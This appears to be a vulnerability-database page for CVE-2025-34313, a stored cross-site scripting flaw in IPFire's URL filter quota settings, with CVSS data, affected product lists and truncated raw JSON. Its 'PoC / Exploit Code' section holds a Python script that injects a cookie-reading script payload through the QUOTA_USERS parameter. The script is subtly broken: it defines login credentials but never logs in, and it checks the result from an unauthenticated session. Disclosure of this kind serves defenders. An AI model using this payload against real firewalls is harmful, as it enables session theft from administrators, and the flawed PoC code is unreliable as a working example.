Security Vulnerability Report
中文
CVE-2025-34313 CVSS 5.4 MEDIUM

CVE-2025-34313

Published: 2025-10-28 15:16:12
Last Modified: 2025-11-03 17:02:29
Source: [email protected]

Description

IPFire versions prior to 2.29 (Core Update 198) contain a stored cross-site scripting (XSS) vulnerability that allows an authenticated attacker to inject arbitrary JavaScript code through the QUOTA_USERS parameter when creating a user quota rule. When a user adds a new user quota rule the application issues an HTTP POST request to /cgi-bin/urlfilter.cgi with the MODE parameter set to USERQUOTA and the assigned user(s) provided in the QUOTA_USERS parameter. The value of this parameter is stored and later rendered in the web interface without proper sanitation or encoding, allowing injected scripts to execute in the context of other users who view the affected quota entry.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:* - VULNERABLE
IPFire < 2.29 (Core Update 198)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-34313 PoC - IPFire Stored XSS via QUOTA_USERS Parameter # Target: IPFire < 2.29 (Core Update 198) # Author: VulnCheck ([email protected]) TARGET_URL = "http://target-ipfire.local/cgi-bin/urlfilter.cgi" USERNAME = "attacker" PASSWORD = "attacker_password" # XSS payload - executes alert when viewed XSS_PAYLOAD = '<script>alert(document.cookie)</script>' def exploit(): """Exploit stored XSS in QUOTA_USERS parameter""" # Step 1: Authenticate to IPFire session = requests.Session() login_data = { 'username': USERNAME, 'password': PASSWORD } # Step 2: Create user quota rule with XSS payload quota_data = { 'MODE': 'USERQUOTA', 'QUOTA_USERS': XSS_PAYLOAD, 'QUOTA_LIMIT': '1000', 'ACTION': 'SAVE' } response = session.post(TARGET_URL, data=quota_data) if response.status_code == 200: print("[+] XSS payload injected successfully") print("[*] Payload stored in QUOTA_USERS parameter") print("[*] Any user viewing quota rules will trigger the XSS") else: print("[-] Exploitation failed") def verify(): """Verify XSS is stored and reflected without encoding""" session = requests.Session() # Access quota rules page response = session.get(TARGET_URL + "?MODE=USERQUOTA") if XSS_PAYLOAD in response.text: print("[+] XSS confirmed - payload reflected without encoding") else: print("[-] XSS not found - may have been patched") if __name__ == "__main__": exploit() verify()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34313", "sourceIdentifier": "[email protected]", "published": "2025-10-28T15:16:11.613", "lastModified": "2025-11-03T17:02:29.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IPFire versions prior to 2.29 (Core Update 198) contain a stored cross-site scripting (XSS) vulnerability that allows an authenticated attacker to inject arbitrary JavaScript code through the QUOTA_USERS parameter when creating a user quota rule. When a user adds a new user quota rule the application issues an HTTP POST request to /cgi-bin/urlfilter.cgi with the MODE parameter set to USERQUOTA and the assigned user(s) provided in the QUOTA_USERS parameter. The value of this parameter is stored and later rendered in the web interface without proper sanitation or encoding, allowing injected scripts to execute in the context of other users who view the affected quota entry."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.29", "matchCriteriaId": "9A0A85D3-A192-4FD9-9510-99D85BCF334A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:*", "matchCriteriaId": "A39350F9-D6D9-49A5-88BC-C5489AA6038C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:*", "matchCriteriaId": "CDDC0CEB-073B-41A0-8A52-4DAAAD77AA6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:*", "matchCriteriaId": "745640B9-2180-48C3-82CC-D6E73AAF95D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:*", "matchCriteriaId": "08006D41-7288-4333-83FE-B6FD7CD5C779"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update187:*:*:*:*:*:*", "matchCriteriaId": "15EE4FEE-62AB-4172-B898-19DE6F50B7AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update188:*:*:*:*:*:*", "matchCriteriaId": "5B0ECE9B-DD45-40E1-842A-0B0B1786187E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update189:*:*:*:*:*:*", "matchCriteriaId": "9B9BDB00-A750-4053-8812-5A3854042CB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update190:*:*:*:*:*:*", "matchCriteriaId": "16F654D7-CC82-4428-BBEF-1110CAE75597"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update191:*:*:*:*:*:*", "matchCriteriaId": "FFCC61A9-AF1B-4F8A-98D2-FB7854AF0EF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update192:*:*:*:*:*:*", "matchCriteriaId": "7A66DC97-E88F-455E-B688-88BCC95E861B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update193:*:*:*:*:*:*", "matchCriteriaId": "DDF56682-47E8-436F-B5FE ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.